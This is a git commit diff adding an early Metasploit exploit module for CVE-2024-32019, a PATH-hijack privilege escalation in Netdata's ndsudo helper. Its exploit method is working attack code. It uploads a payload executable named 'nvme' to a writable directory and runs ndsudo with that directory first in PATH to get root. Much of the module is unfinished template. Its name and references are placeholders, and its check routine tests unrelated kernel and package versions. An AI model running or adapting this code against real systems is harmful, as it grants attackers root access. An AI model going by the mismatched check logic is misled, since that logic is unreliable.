Module init

msutovsky-r7 · msutovsky-r7 · commit 936e68eb2e4d · 2025-08-08T07:53:56.000+02:00
diff --git a/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb b/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  # includes: is_root?
+  include Msf::Post::Linux::Priv
+  # includes: has_gcc?
+  include Msf::Post::Linux::System
+  # includes: kernel_release
+  include Msf::Post::Linux::Kernel
+  # includes writable?, upload_file, upload_and_chmodx, exploit_data
+  include Msf::Post::File
+  # includes generate_payload_exe
+  include Msf::Exploit::EXE
+  # includes register_files_for_cleanup
+  include Msf::Exploit::FileDropper
+  # includes: COMPILE option, live_compile?, upload_and_compile
+  # strip_comments
+  include Msf::Post::Linux::Compile
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name' => 'Sample Linux Priv Esc',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        },
+        'License' => MSF_LICENSE,
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author' => [
+          'msutovsky-r7', # msf module
+          'mia-0' # security researcher
+        ],
+        'Platform' => [ 'linux' ],
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
+        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
+        # A full list is available in lib/msf/core/payload/uuid.rb
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
+        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
+        # test both to ensure compatibility.
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        # since privilege escalation modules typically result in elevated privileges, this is
+        # generally set to true
+        'Privileged' => true,
+        'References' => [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '2024-32019']
+        ],
+        'DisclosureDate' => '2024-04-12',
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def check
+
+    release = kernel_release
+    begin
+      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
+         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
+        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+      end
+    rescue ArgumentError => e
+      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
+    end
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    # Check the app is installed and the version, debian based example
+    package = cmd_exec('dpkg -l example | grep \'^ii\'')
+    if package&.include?('1:2015.3.14AR.1-1build1')
+      return CheckCode::Appears("Vulnerable app version #{package} detected")
+    end
+
+    CheckCode::Safe("app #{package} is not vulnerable")
+  end
+
+  def exploit
+
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    executable_path = "#{base_dir}/nvme"
+
+    upload_and_chmodx(executable_path, generate_payload_exe)
+
+
+    register_files_for_cleanup(executable_path)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "PATH=#{base_dir}:$PATH /usr/libexec/netdata/plugins.d/ndsudo nvme-list", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end
